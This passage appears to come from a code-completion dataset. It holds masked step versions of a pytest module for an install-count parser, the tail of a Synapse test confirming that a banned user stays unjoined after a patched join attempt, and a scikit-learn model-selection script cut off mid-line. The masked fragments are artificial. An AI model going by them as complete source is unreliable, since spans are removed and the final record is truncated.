self.assertEqual(alice_sync_result.joined[0].room_id, room_id)\n last_room_creation_event_id = (\n alice_sync_result.joined[0].timeline.events[-1].event_id\n )\n\n # Eve, a ne'er-do-well, registers.\n eve = self.register_user(\"eve\", \"password\")\n eve_token = self.login(eve, \"password\")\n\n # Alice preemptively bans Eve.\n self.helper.ban(room_id, owner, eve, tok=owner_tok)\n\n # Eve syncs.\n eve_requester = create_requester(eve)\n eve_sync_config = generate_sync_config(eve)\n eve_sync_after_ban: SyncResult = self.get_success(\n self.sync_handler.wait_for_sync_for_user(eve_requester, eve_sync_config)\n )\n\n # Sanity check this sync result. We shouldn't be joined to the room.\n self.assertEqual(eve_sync_after_ban.joined, [])\n\n # Eve tries to join the room. We monkey patch the internal logic which selects\n # the prev_events used when creating the join event, such that the ban does not\n # precede the join.\n mocked_get_prev_events = patch.object(\n self.hs.get_datastores().main,\n \"get_prev_events_for_room\",\n new_callable=AsyncMock,\n return_value=[last_room_creation_event_id],\n )\n with mocked_get_prev_events:\n self.helper.join(room_id, eve, tok=eve_token)\n\n # Eve makes a second, incremental sync.\n eve_incremental_sync_after_join: SyncResult = self.get_success(\n self.sync_handler.wait_for_sync_for_user(\n eve_requester,\n eve_sync_config,\n since_token=eve_sync_after_ban.next_batch,\n )\n )\n # Eve should not see herself as joined to the room.\n self.assertEqual(eve_incremental_sync_after_join.joined, [])\n\n # If we did a third initial sync, we should _still_ see eve is not joined to the room.\n eve_initial_sync_after_join: SyncResult = self.get_success(\n self.sync_handler.wait_for_sync_for_user(\n eve_requester,\n eve_sync_config,\n since_token=None,\n )\n )\n self.assertEqual(eve_initial_sync_after_join.joined, [])\n\n\n_request_key = 0\n\n\ndef generate_sync_config(\n user_id: str, device_id: Optional[str] = \"device_id\"\n) -> SyncConfig:\n \"\"\"Generate a sync config (with a unique request key).\"\"\"\n global _request_key\n _request_key += 1\n return SyncConfig(\n user=UserID.from_string(user_id),\n filter_collection=Filtering(Mock()).DEFAULT_FILTER_COLLECTION,\n is_guest=False,\n request_key=(\"request_key\", _request_key),\n device_id=device_id,\n )\n",
"step-ids": [
6,
8,
9,
10,
11
]
}
|
[
6,
8,
9,
10,
11
] |
<|reserved_special_token_0|>
def int_installs(x):
try:
return int(x.replace(',', '').replace('+', ''))
except:
raise ValueError('Cannot transform to int.')
def test_int_install_1():
"""Unit test to showcase functionality of int of int
"""
expected_output_price = 65000
output_price = int_installs('65000')
assert math.fabs(output_price - expected_output_price
) < ROUND_OFF_ERROR, 'Should show that the installs is 65000.'
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def int_installs(x):
try:
return int(x.replace(',', '').replace('+', ''))
except:
raise ValueError('Cannot transform to int.')
def test_int_install_1():
"""Unit test to showcase functionality of int of int
"""
expected_output_price = 65000
output_price = int_installs('65000')
assert math.fabs(output_price - expected_output_price
) < ROUND_OFF_ERROR, 'Should show that the installs is 65000.'
def test_int_install_2():
"""Unit test to showcase functionality of int of string with right format
"""
expected_output_price = 65000
output_price = int_installs('+65,000')
assert math.fabs(output_price - expected_output_price
) < ROUND_OFF_ERROR, 'Should show that the installs is 65000.'
def test_int_install_3():
"""Unit test to showcase functionality of int of strong with wrong format
"""
with pytest.raises(ValueError):
int_installs('$65000')
<|reserved_special_token_1|>
<|reserved_special_token_0|>
ROUND_OFF_ERROR = 0.001
def int_installs(x):
try:
return int(x.replace(',', '').replace('+', ''))
except:
raise ValueError('Cannot transform to int.')
def test_int_install_1():
"""Unit test to showcase functionality of int of int
"""
expected_output_price = 65000
output_price = int_installs('65000')
assert math.fabs(output_price - expected_output_price
) < ROUND_OFF_ERROR, 'Should show that the installs is 65000.'
def test_int_install_2():
"""Unit test to showcase functionality of int of string with right format
"""
expected_output_price = 65000
output_price = int_installs('+65,000')
assert math.fabs(output_price - expected_output_price
) < ROUND_OFF_ERROR, 'Should show that the installs is 65000.'
def test_int_install_3():
"""Unit test to showcase functionality of int of strong with wrong format
"""
with pytest.raises(ValueError):
int_installs('$65000')
<|reserved_special_token_1|>
<|reserved_special_token_0|>
import math
import pytest
ROUND_OFF_ERROR = 0.001
def int_installs(x):
try:
return int(x.replace(',', '').replace('+', ''))
except:
raise ValueError('Cannot transform to int.')
def test_int_install_1():
"""Unit test to showcase functionality of int of int
"""
expected_output_price = 65000
output_price = int_installs('65000')
assert math.fabs(output_price - expected_output_price
) < ROUND_OFF_ERROR, 'Should show that the installs is 65000.'
def test_int_install_2():
"""Unit test to showcase functionality of int of string with right format
"""
expected_output_price = 65000
output_price = int_installs('+65,000')
assert math.fabs(output_price - expected_output_price
) < ROUND_OFF_ERROR, 'Should show that the installs is 65000.'
def test_int_install_3():
"""Unit test to showcase functionality of int of strong with wrong format
"""
with pytest.raises(ValueError):
int_installs('$65000')
<|reserved_special_token_1|>
"""Unit test for int install
"""
import math
import pytest
ROUND_OFF_ERROR = 0.001
def int_installs(x):
try:
return int(x.replace(',', '').replace('+', ''))
except:
raise ValueError("Cannot transform to int.")
def test_int_install_1():
"""Unit test to showcase functionality of int of int
"""
expected_output_price = 65000
output_price = int_installs('65000')
assert math.fabs(output_price - expected_output_price) < ROUND_OFF_ERROR, \
"""Should show that the installs is 65000."""
def test_int_install_2():
"""Unit test to showcase functionality of int of string with right format
"""
expected_output_price = 65000
output_price = int_installs('+65,000')
assert math.fabs(output_price - expected_output_price) < ROUND_OFF_ERROR, \
"""Should show that the installs is 65000."""
def test_int_install_3():
"""Unit test to showcase functionality of int of strong with wrong format
"""
with pytest.raises(ValueError):
int_installs('$65000')
|
flexible
|
{
"blob_id": "b874bfe9590a3eaff4298d6f9cc72be92000dc30",
"index": 1108,
"step-1": "<mask token>\n\n\ndef int_installs(x):\n try:\n return int(x.replace(',', '').replace('+', ''))\n except:\n raise ValueError('Cannot transform to int.')\n\n\ndef test_int_install_1():\n \"\"\"Unit test to showcase functionality of int of int\n \"\"\"\n expected_output_price = 65000\n output_price = int_installs('65000')\n assert math.fabs(output_price - expected_output_price\n ) < ROUND_OFF_ERROR, 'Should show that the installs is 65000.'\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef int_installs(x):\n try:\n return int(x.replace(',', '').replace('+', ''))\n except:\n raise ValueError('Cannot transform to int.')\n\n\ndef test_int_install_1():\n \"\"\"Unit test to showcase functionality of int of int\n \"\"\"\n expected_output_price = 65000\n output_price = int_installs('65000')\n assert math.fabs(output_price - expected_output_price\n ) < ROUND_OFF_ERROR, 'Should show that the installs is 65000.'\n\n\ndef test_int_install_2():\n \"\"\"Unit test to showcase functionality of int of string with right format\n \"\"\"\n expected_output_price = 65000\n output_price = int_installs('+65,000')\n assert math.fabs(output_price - expected_output_price\n ) < ROUND_OFF_ERROR, 'Should show that the installs is 65000.'\n\n\ndef test_int_install_3():\n \"\"\"Unit test to showcase functionality of int of strong with wrong format\n \"\"\"\n with pytest.raises(ValueError):\n int_installs('$65000')\n",
"step-3": "<mask token>\nROUND_OFF_ERROR = 0.001\n\n\ndef int_installs(x):\n try:\n return int(x.replace(',', '').replace('+', ''))\n except:\n raise ValueError('Cannot transform to int.')\n\n\ndef test_int_install_1():\n \"\"\"Unit test to showcase functionality of int of int\n \"\"\"\n expected_output_price = 65000\n output_price = int_installs('65000')\n assert math.fabs(output_price - expected_output_price\n ) < ROUND_OFF_ERROR, 'Should show that the installs is 65000.'\n\n\ndef test_int_install_2():\n \"\"\"Unit test to showcase functionality of int of string with right format\n \"\"\"\n expected_output_price = 65000\n output_price = int_installs('+65,000')\n assert math.fabs(output_price - expected_output_price\n ) < ROUND_OFF_ERROR, 'Should show that the installs is 65000.'\n\n\ndef test_int_install_3():\n \"\"\"Unit test to showcase functionality of int of strong with wrong format\n \"\"\"\n with pytest.raises(ValueError):\n int_installs('$65000')\n",
"step-4": "<mask token>\nimport math\nimport pytest\nROUND_OFF_ERROR = 0.001\n\n\ndef int_installs(x):\n try:\n return int(x.replace(',', '').replace('+', ''))\n except:\n raise ValueError('Cannot transform to int.')\n\n\ndef test_int_install_1():\n \"\"\"Unit test to showcase functionality of int of int\n \"\"\"\n expected_output_price = 65000\n output_price = int_installs('65000')\n assert math.fabs(output_price - expected_output_price\n ) < ROUND_OFF_ERROR, 'Should show that the installs is 65000.'\n\n\ndef test_int_install_2():\n \"\"\"Unit test to showcase functionality of int of string with right format\n \"\"\"\n expected_output_price = 65000\n output_price = int_installs('+65,000')\n assert math.fabs(output_price - expected_output_price\n ) < ROUND_OFF_ERROR, 'Should show that the installs is 65000.'\n\n\ndef test_int_install_3():\n \"\"\"Unit test to showcase functionality of int of strong with wrong format\n \"\"\"\n with pytest.raises(ValueError):\n int_installs('$65000')\n",
"step-5": "\"\"\"Unit test for int install\n\"\"\"\nimport math\nimport pytest\n\nROUND_OFF_ERROR = 0.001\n\ndef int_installs(x):\n try:\n return int(x.replace(',', '').replace('+', ''))\n except:\n raise ValueError(\"Cannot transform to int.\")\n \ndef test_int_install_1():\n \"\"\"Unit test to showcase functionality of int of int\n \"\"\"\n expected_output_price = 65000\n output_price = int_installs('65000')\n assert math.fabs(output_price - expected_output_price) < ROUND_OFF_ERROR, \\\n \"\"\"Should show that the installs is 65000.\"\"\"\n\ndef test_int_install_2():\n \"\"\"Unit test to showcase functionality of int of string with right format\n \"\"\"\n expected_output_price = 65000\n output_price = int_installs('+65,000')\n assert math.fabs(output_price - expected_output_price) < ROUND_OFF_ERROR, \\\n \"\"\"Should show that the installs is 65000.\"\"\"\n\ndef test_int_install_3():\n \"\"\"Unit test to showcase functionality of int of strong with wrong format\n \"\"\"\n with pytest.raises(ValueError): \n int_installs('$65000')",
"step-ids": [
2,
4,
5,
6,
7
]
}
|
[
2,
4,
5,
6,
7
] |
import numpy as np
import pandas as pd
import datetime
import time
from sklearn.tree import DecisionTreeClassifier
from sklearn.neighbors import KNeighborsClassifier
from sklearn.neighbors import KNeighborsRegressor
from sklearn.model_selection import cross_val_score
from sklearn import preprocessing
from sklearn.model_selection import KFold
def make_submission(y_predict, user_id_test, movie_id_test, name=None, date=True):
n_elements = len(y_predict)
if name is None:
name = 'submission'
if date:
name = name + '_{}'.format(time.strftime('%d-%m-%Y_%Hh%M'))
with open(name + ".csv", 'w') as f:
f.write('"USER_ID_MOVIE_ID","PREDICTED_RATING"\n')
for i in range(n_elements):
if np.isnan(y_predict[i]):
raise ValueError('NaN detected!')
line = '{:0.0f},{:0.0f},{}\n'.format(user_id_test[i],movie_id_test[i],y_predict[i])
f.write(line)
print("Submission file successfully written!")
class ModelSelection:
def __init__(self, user_data, movie_data, aggregated_data, train_data, output_train):
self.train = train_data
self.users = user_data
self.aggregated = aggregated_data
self.movies = movie_data
self.output_train = output_train
def optimizeParametersDecisionTreeClassifier(self, nb_fold, max_depth_range):
kf = KFold(n_splits=nb_fold)
depth_n_errors = np.zeros((max_depth_range.__len__(), 2))
i = 0
for depth in max_depth_range:
depth_n_errors[i][0] = depth
i += 1
#First round of cv
for train_index, test_index in kf.split(self.aggregated):
#Second round of cv
i = 0
for depth in max_depth_range:
dt = DecisionTreeClassifier(max_depth=depth)
scores = cross_val_score(dt, self.aggregated[train_index], self.output_train[train_index], cv=nb_fold, scoring='neg_mean_squared_error')
depth_n_errors[i][1] += -scores.mean()
i += 1
i = 0
for depth in max_depth_range:
depth_n_errors[i][1] /= nb_fold
i += 1
best_depth = 0
best_error = 5
#Take the best model and cross validate it on the whole data
for depth, error in depth_n_errors:
if(error < best_error):
best_error = error
best_depth = depth
#Recompute the error for this model on the whole data set
dt = DecisionTreeClassifier(max_depth=best_depth)
final_error = -cross_val_score(dt, self.aggregated, self.output_train, cv=nb_fold, scoring='neg_mean_squared_error')
return[best_depth, final_error.mean()]
def optimizeParametersKNeighborsClassifier(self, nb_fold, k_range):
kf = KFold(n_splits=nb_fold)
k_n_errors = np.zeros((k_range.__len__(), 2))
i = 0
for k in k_range:
k_n_errors[i][0] = k
i += 1
#First round of cv
for train_index, test_index in kf.split(self.aggregated):
#Second round of cv
i = 0
for k in k_range:
dt = KNeighborsClassifier(n_neighbors=k)
scores = cross_val_score(dt, self.aggregated[train_index], self.output_train[train_index], cv=nb_fold, scoring='neg_mean_squared_error')
k_n_errors[i][1] += -scores.mean()
i += 1
for i in range(k_range.__len__()):
k_n_errors[i][1] /= nb_fold
best_k = 0
best_error = 5
#Take the best model and cross validate it on the whole data
for k, error in k_n_errors:
if(error < best_error):
best_error = error
best_k = k
#Recompute the error for this model on the whole data set
dt = KNeighborsClassifier(n_neighbors=best_k)
final_error = -cross_val_score(dt, self.aggregated, self.output_train, cv=nb_fold, scoring='neg_mean_squared_error')
return[best_k, final_error.mean()]
def optimizeParametersKNeighborsRegressor(self, nb_fold, k_range):
kf = KFold(n_splits=nb_fold)
k_n_errors = np.zeros((k_range.__len__(), 2))
i = 0
for k in k_range:
k_n_errors[i][0] = k
i += 1
#First round of cv
for train_index, test_index in kf.split(self.aggregated):
#Second round of cv
i = 0
for k in k_range:
dt = KNeighborsRegressor(n_neighbors=k)
scores = cross_val_score(dt, self.aggregated[train_index], self.output_train[train_index], cv=nb_fold, scoring='neg_mean_squared_error')
k_n_errors[i][1] += -scores.mean()
i += 1
for i in range(k_range.__len__()):
k_n_errors[i][1] /= nb_fold
best_k = 0
best_error = 5
#Take the best model and cross validate it on the whole data
for k, error in k_n_errors:
if(error < best_error):
best_error = error
best_k = k
#Recompute the error for this model on the whole data set
dt = KNeighborsRegressor(n_neighbors=best_k)
final_error = -cross_val_score(dt, self.aggregated, self.output_train, cv=nb_fold, scoring='neg_mean_squared_error')
return[best_k, final_error.mean()]
users = pd.read_csv("data/user_data_normalized_28-11-2016_01h32.csv", delimiter=",")
movies = pd.read_csv("data/movie_data_normalized.csv", delimiter=",")
train = pd.read_csv("data/data_train.csv", delimiter=",")
output = pd.read_csv("data/output_train.csv", delimiter=",")["rating"]
aggregated = pd.read_csv("data/agregated_data_28-11-2016_01h50.csv", delimiter=",")
ms = ModelSelection(users.values, movies.values, aggregated.values, train.values, output)
#print(ms.optimizeParametersDecisionTreeClassifier(5, range(2,3,1)))
print(ms.optimizeParametersKNeighborsClassifier(5, range(1,5,1)))
#print(ms.optimizeParametersKNeighborsClassifier(5, range(5,10,1)))
|
normal
|
{
"blob_id": "5172819da135600d0764033a85a4175098274806",
"index": 7388,
"step-1": "<mask token>\n\n\nclass ModelSelection:\n\n def __init__(self, user_data, movie_data, aggregated_data, train_data,\n output_train):\n self.train = train_data\n self.users = user_data\n self.aggregated = aggregated_data\n self.movies = movie_data\n self.output_train = output_train\n\n def optimizeParametersDecisionTreeClassifier(self, nb_fold, max_depth_range\n ):\n kf = KFold(n_splits=nb_fold)\n depth_n_errors = np.zeros((max_depth_range.__len__(), 2))\n i = 0\n for depth in max_depth_range:\n depth_n_errors[i][0] = depth\n i += 1\n for train_index, test_index in kf.split(self.aggregated):\n i = 0\n for depth in max_depth_range:\n dt = DecisionTreeClassifier(max_depth=depth)\n scores = cross_val_score(dt, self.aggregated[train_index],\n self.output_train[train_index], cv=nb_fold, scoring=\n 'neg_mean_squared_error')\n depth_n_errors[i][1] += -scores.mean()\n i += 1\n i = 0\n for depth in max_depth_range:\n depth_n_errors[i][1] /= nb_fold\n i += 1\n best_depth = 0\n best_error = 5\n for depth, error in depth_n_errors:\n if error < best_error:\n best_error = error\n best_depth = depth\n dt = DecisionTreeClassifier(max_depth=best_depth)\n final_error = -cross_val_score(dt, self.aggregated, self.\n output_train, cv=nb_fold, scoring='neg_mean_squared_error')\n return [best_depth, final_error.mean()]\n\n def optimizeParametersKNeighborsClassifier(self, nb_fold, k_range):\n kf = KFold(n_splits=nb_fold)\n k_n_errors = np.zeros((k_range.__len__(), 2))\n i = 0\n for k in k_range:\n k_n_errors[i][0] = k\n i += 1\n for train_index, test_index in kf.split(self.aggregated):\n i = 0\n for k in k_range:\n dt = KNeighborsClassifier(n_neighbors=k)\n scores = cross_val_score(dt, self.aggregated[train_index],\n self.output_train[train_index], cv=nb_fold, scoring=\n 'neg_mean_squared_error')\n k_n_errors[i][1] += -scores.mean()\n i += 1\n for i in range(k_range.__len__()):\n k_n_errors[i][1] /= nb_fold\n best_k = 0\n best_error = 5\n for k, error in k_n_errors:\n if error < best_error:\n best_error = error\n best_k = k\n dt = KNeighborsClassifier(n_neighbors=best_k)\n final_error = -cross_val_score(dt, self.aggregated, self.\n output_train, cv=nb_fold, scoring='neg_mean_squared_error')\n return [best_k, final_error.mean()]\n\n def optimizeParametersKNeighborsRegressor(self, nb_fold, k_range):\n kf = KFold(n_splits=nb_fold)\n k_n_errors = np.zeros((k_range.__len__(), 2))\n i = 0\n for k in k_range:\n k_n_errors[i][0] = k\n i += 1\n for train_index, test_index in kf.split(self.aggregated):\n i = 0\n for k in k_range:\n dt = KNeighborsRegressor(n_neighbors=k)\n scores = cross_val_score(dt, self.aggregated[train_index],\n self.output_train[train_index], cv=nb_fold, scoring=\n 'neg_mean_squared_error')\n k_n_errors[i][1] += -scores.mean()\n i += 1\n for i in range(k_range.__len__()):\n k_n_errors[i][1] /= nb_fold\n best_k = 0\n best_error = 5\n for k, error in k_n_errors:\n if error < best_error:\n best_error = error\n best_k = k\n dt = KNeighborsRegressor(n_neighbors=best_k)\n final_error = -cross_val_score(dt, self.aggregated, self.\n output_train, cv=nb_fold, scoring='neg_mean_squared_error')\n return [best_k, final_error.mean()]\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef make_submission(y_predict, user_id_test, movie_id_test, name=None, date\n =True):\n n_elements = len(y_predict)\n if name is None:\n name = 'submission'\n if date:\n name = name + '_{}'.format(time.strftime('%d-%m-%Y_%Hh%M'))\n with open(name + '.csv', 'w') as f:\n f.write('\"USER_ID_MOVIE_ID\",\"PREDICTED_RATING\"\\n')\n for i in range(n_elements):\n if np.isnan(y_predict[i]):\n raise ValueError('NaN detected!')\n line = '{:0.0f},{:0.0f},{}\\n'.format(user_id_test[i],\n movie_id_test[i], y_predict[i])\n f.write(line)\n print('Submission file successfully written!')\n\n\nclass ModelSelection:\n\n def __init__(self, user_data, movie_data, aggregated_data, train_data,\n output_train):\n self.train = train_data\n self.users = user_data\n self.aggregated = aggregated_data\n self.movies = movie_data\n self.output_train = output_train\n\n def optimizeParametersDecisionTreeClassifier(self, nb_fold, max_depth_range\n ):\n kf = KFold(n_splits=nb_fold)\n depth_n_errors = np.zeros((max_depth_range.__len__(), 2))\n i = 0\n for depth in max_depth_range:\n depth_n_errors[i][0] = depth\n i += 1\n for train_index, test_index in kf.split(self.aggregated):\n i = 0\n for depth in max_depth_range:\n dt = DecisionTreeClassifier(max_depth=depth)\n scores = cross_val_score(dt, self.aggregated[train_index],\n self.output_train[train_index], cv=nb_fold, scoring=\n 'neg_mean_squared_error')\n depth_n_errors[i][1] += -scores.mean()\n i += 1\n i = 0\n for depth in max_depth_range:\n depth_n_errors[i][1] /= nb_fold\n i += 1\n best_depth = 0\n best_error = 5\n for depth, error in depth_n_errors:\n if error < best_error:\n best_error = error\n best_depth = depth\n dt = DecisionTreeClassifier(max_depth=best_depth)\n final_error = -cross_val_score(dt, self.aggregated, self.\n output_train, cv=nb_fold, scoring='neg_mean_squared_error')\n return [best_depth, final_error.mean()]\n\n def optimizeParametersKNeighborsClassifier(self, nb_fold, k_range):\n kf = KFold(n_splits=nb_fold)\n k_n_errors = np.zeros((k_range.__len__(), 2))\n i = 0\n for k in k_range:\n k_n_errors[i][0] = k\n i += 1\n for train_index, test_index in kf.split(self.aggregated):\n i = 0\n for k in k_range:\n dt = KNeighborsClassifier(n_neighbors=k)\n scores = cross_val_score(dt, self.aggregated[train_index],\n self.output_train[train_index], cv=nb_fold, scoring=\n 'neg_mean_squared_error')\n k_n_errors[i][1] += -scores.mean()\n i += 1\n for i in range(k_range.__len__()):\n k_n_errors[i][1] /= nb_fold\n best_k = 0\n best_error = 5\n for k, error in k_n_errors:\n if error < best_error:\n best_error = error\n best_k = k\n dt = KNeighborsClassifier(n_neighbors=best_k)\n final_error = -cross_val_score(dt, self.aggregated, self.\n output_train, cv=nb_fold, scoring='neg_mean_squared_error')\n return [best_k, final_error.mean()]\n\n def optimizeParametersKNeighborsRegressor(self, nb_fold, k_range):\n kf = KFold(n_splits=nb_fold)\n k_n_errors = np.zeros((k_range.__len__(), 2))\n i = 0\n for k in k_range:\n k_n_errors[i][0] = k\n i += 1\n for train_index, test_index in kf.split(self.aggregated):\n i = 0\n for k in k_range:\n dt = KNeighborsRegressor(n_neighbors=k)\n scores = cross_val_score(dt, self.aggregated[train_index],\n self.output_train[train_index], cv=nb_fold, scoring=\n 'neg_mean_squared_error')\n k_n_errors[i][1] += -scores.mean()\n i += 1\n for i in range(k_range.__len__()):\n k_n_errors[i][1] /= nb_fold\n best_k = 0\n best_error = 5\n for k, error in k_n_errors:\n if error < best_error:\n best_error = error\n best_k = k\n dt = KNeighborsRegressor(n_neighbors=best_k)\n final_error = -cross_val_score(dt, self.aggregated, self.\n output_train, cv=nb_fold, scoring='neg_mean_squared_error')\n return [best_k, final_error.mean()]\n\n\n<mask token>\nprint(ms.optimizeParametersKNeighborsClassifier(5, range(1, 5, 1)))\n",
"step-3": "<mask token>\n\n\ndef make_submission(y_predict, user_id_test, movie_id_test, name=None, date\n =True):\n n_elements = len(y_predict)\n if name is None:\n name = 'submission'\n if date:\n name = name + '_{}'.format(time.strftime('%d-%m-%Y_%Hh%M'))\n with open(name + '.csv', 'w') as f:\n f.write('\"USER_ID_MOVIE_ID\",\"PREDICTED_RATING\"\\n')\n for i in range(n_elements):\n if np.isnan(y_predict[i]):\n raise ValueError('NaN detected!')\n line = '{:0.0f},{:0.0f},{}\\n'.format(user_id_test[i],\n movie_id_test[i], y_predict[i])\n f.write(line)\n print('Submission file successfully written!')\n\n\nclass ModelSelection:\n\n def __init__(self, user_data, movie_data, aggregated_data, train_data,\n output_train):\n self.train = train_data\n self.users = user_data\n self.aggregated = aggregated_data\n self.movies = movie_data\n self.output_train = output_train\n\n def optimizeParametersDecisionTreeClassifier(self, nb_fold, max_depth_range\n ):\n kf = KFold(n_splits=nb_fold)\n depth_n_errors = np.zeros((max_depth_range.__len__(), 2))\n i = 0\n for depth in max_depth_range:\n depth_n_errors[i][0] = depth\n i += 1\n for train_index, test_index in kf.split(self.aggregated):\n i = 0\n for depth in max_depth_range:\n dt = DecisionTreeClassifier(max_depth=depth)\n scores = cross_val_score(dt, self.aggregated[train_index],\n self.output_train[train_index], cv=nb_fold, scoring=\n 'neg_mean_squared_error')\n depth_n_errors[i][1] += -scores.mean()\n i += 1\n i = 0\n for depth in max_depth_range:\n depth_n_errors[i][1] /= nb_fold\n i += 1\n best_depth = 0\n best_error = 5\n for depth, error in depth_n_errors:\n if error < best_error:\n best_error = error\n best_depth = depth\n dt = DecisionTreeClassifier(max_depth=best_depth)\n final_error = -cross_val_score(dt, self.aggregated, self.\n output_train, cv=nb_fold, scoring='neg_mean_squared_error')\n return [best_depth, final_error.mean()]\n\n def optimizeParametersKNeighborsClassifier(self, nb_fold, k_range):\n kf = KFold(n_splits=nb_fold)\n k_n_errors = np.zeros((k_range.__len__(), 2))\n i = 0\n for k in k_range:\n k_n_errors[i][0] = k\n i += 1\n for train_index, test_index in kf.split(self.aggregated):\n i = 0\n for k in k_range:\n dt = KNeighborsClassifier(n_neighbors=k)\n scores = cross_val_score(dt, self.aggregated[train_index],\n self.output_train[train_index], cv=nb_fold, scoring=\n 'neg_mean_squared_error')\n k_n_errors[i][1] += -scores.mean()\n i += 1\n for i in range(k_range.__len__()):\n k_n_errors[i][1] /= nb_fold\n best_k = 0\n best_error = 5\n for k, error in k_n_errors:\n if error < best_error:\n best_error = error\n best_k = k\n dt = KNeighborsClassifier(n_neighbors=best_k)\n final_error = -cross_val_score(dt, self.aggregated, self.\n output_train, cv=nb_fold, scoring='neg_mean_squared_error')\n return [best_k, final_error.mean()]\n\n def optimizeParametersKNeighborsRegressor(self, nb_fold, k_range):\n kf = KFold(n_splits=nb_fold)\n k_n_errors = np.zeros((k_range.__len__(), 2))\n i = 0\n for k in k_range:\n k_n_errors[i][0] = k\n i += 1\n for train_index, test_index in kf.split(self.aggregated):\n i = 0\n for k in k_range:\n dt = KNeighborsRegressor(n_neighbors=k)\n scores = cross_val_score(dt, self.aggregated[train_index],\n self.output_train[train_index], cv=nb_fold, scoring=\n 'neg_mean_squared_error')\n k_n_errors[i][1] += -scores.mean()\n i += 1\n for i in range(k_range.__len__()):\n k_n_errors[i][1] /= nb_fold\n best_k = 0\n best_error = 5\n for k, error in k_n_errors:\n if error < best_error:\n best_error = error\n best_k = k\n dt = KNeighborsRegressor(n_neighbors=best_k)\n final_error = -cross_val_score(dt, self.aggregated, self.\n output_train, cv=nb_fold, scoring='neg_mean_squared_error')\n return [best_k, final_error.mean()]\n\n\nusers = pd.read_csv('data/user_data_normalized_28-11-2016_01h32.csv',\n delimiter=',')\nmovies = pd.read_csv('data/movie_data_normalized.csv', delimiter=',')\ntrain = pd.read_csv('data/data_train.csv', delimiter=',')\noutput = pd.read_csv('data/output_train.csv', delimiter=',')['rating']\naggregated = pd.read_csv('data/agregated_data_28-11-2016_01h50.csv',\n delimiter=',')\nms = ModelSelection(users.values, movies.values, aggregated.values, train.\n values, output)\nprint(ms.optimizeParametersKNeighborsClassifier(5, range(1, 5, 1)))\n",
"step-4": "import numpy as np\nimport pandas as pd\nimport datetime\nimport time\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.neighbors import KNeighborsRegressor\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn import preprocessing\nfrom sklearn.model_selection import KFold\n\n\ndef make_submission(y_predict, user_id_test, movie_id_test, name=None, date\n =True):\n n_elements = len(y_predict)\n if name is None:\n name = 'submission'\n if date:\n name = name + '_{}'.format(time.strftime('%d-%m-%Y_%Hh%M'))\n with open(name + '.csv', 'w') as f:\n f.write('\"USER_ID_MOVIE_ID\",\"PREDICTED_RATING\"\\n')\n for i in range(n_elements):\n if np.isnan(y_predict[i]):\n raise ValueError('NaN detected!')\n line = '{:0.0f},{:0.0f},{}\\n'.format(user_id_test[i],\n movie_id_test[i], y_predict[i])\n f.write(line)\n print('Submission file successfully written!')\n\n\nclass ModelSelection:\n\n def __init__(self, user_data, movie_data, aggregated_data, train_data,\n output_train):\n self.train = train_data\n self.users = user_data\n self.aggregated = aggregated_data\n self.movies = movie_data\n self.output_train = output_train\n\n def optimizeParametersDecisionTreeClassifier(self, nb_fold, max_depth_range\n ):\n kf = KFold(n_splits=nb_fold)\n depth_n_errors = np.zeros((max_depth_range.__len__(), 2))\n i = 0\n for depth in max_depth_range:\n depth_n_errors[i][0] = depth\n i += 1\n for train_index, test_index in kf.split(self.aggregated):\n i = 0\n for depth in max_depth_range:\n dt = DecisionTreeClassifier(max_depth=depth)\n scores = cross_val_score(dt, self.aggregated[train_index],\n self.output_train[train_index], cv=nb_fold, scoring=\n 'neg_mean_squared_error')\n depth_n_errors[i][1] += -scores.mean()\n i += 1\n i = 0\n for depth in max_depth_range:\n depth_n_errors[i][1] /= nb_fold\n i += 1\n best_depth = 0\n best_error = 5\n for depth, error in depth_n_errors:\n if error < best_error:\n best_error = error\n best_depth = depth\n dt = DecisionTreeClassifier(max_depth=best_depth)\n final_error = -cross_val_score(dt, self.aggregated, self.\n output_train, cv=nb_fold, scoring='neg_mean_squared_error')\n return [best_depth, final_error.mean()]\n\n def optimizeParametersKNeighborsClassifier(self, nb_fold, k_range):\n kf = KFold(n_splits=nb_fold)\n k_n_errors = np.zeros((k_range.__len__(), 2))\n i = 0\n for k in k_range:\n k_n_errors[i][0] = k\n i += 1\n for train_index, test_index in kf.split(self.aggregated):\n i = 0\n for k in k_range:\n dt = KNeighborsClassifier(n_neighbors=k)\n scores = cross_val_score(dt, self.aggregated[train_index],\n self.output_train[train_index], cv=nb_fold, scoring=\n 'neg_mean_squared_error')\n k_n_errors[i][1] += -scores.mean()\n i += 1\n for i in range(k_range.__len__()):\n k_n_errors[i][1] /= nb_fold\n best_k = 0\n best_error = 5\n for k, error in k_n_errors:\n if error < best_error:\n best_error = error\n best_k = k\n dt = KNeighborsClassifier(n_neighbors=best_k)\n final_error = -cross_val_score(dt, self.aggregated, self.\n output_train, cv=nb_fold, scoring='neg_mean_squared_error')\n return [best_k, final_error.mean()]\n\n def optimizeParametersKNeighborsRegressor(self, nb_fold, k_range):\n kf = KFold(n_splits=nb_fold)\n k_n_errors = np.zeros((k_range.__len__(), 2))\n i = 0\n for k in k_range:\n k_n_errors[i][0] = k\n i += 1\n for train_index, test_index in kf.split(self.aggregated):\n i = 0\n for k in k_range:\n dt = KNeighborsRegressor(n_neighbors=k)\n scores = cross_val_score(dt, self.aggregated[train_index],\n self.output_train[train_index], cv=nb_fold, scoring=\n 'neg_mean_squared_error')\n k_n_errors[i][1] += -scores.mean()\n i += 1\n for i in range(k_range.__len__()):\n k_n_errors[i][1] /= nb_fold\n best_k = 0\n best_error = 5\n for k, error in k_n_errors:\n if error < best_error:\n best_error = error\n best_k = k\n dt = KNeighborsRegressor(n_neighbors=best_k)\n final_error = -cross_val_score(dt, self.aggregated, self.\n output_train, cv=nb_fold, scoring='neg_mean_squared_error')\n return [best_k, final_error.mean()]\n\n\nusers = pd.read_csv('data/user_data_normalized_28-11-2016_01h32.csv',\n delimiter=',')\nmovies = pd.read_csv('data/movie_data_normalized.csv', delimiter=',')\ntrain = pd.read_csv('data/data_train.csv', delimiter=',')\noutput = pd.read_csv('data/output_train.csv', delimiter=',')['rating']\naggregated = pd.read_csv('data/agregated_data_28-11-2016_01h50.csv',\n delimiter=',')\nms = ModelSelection(users.values, movies.values, aggregated.values, train.\n values, 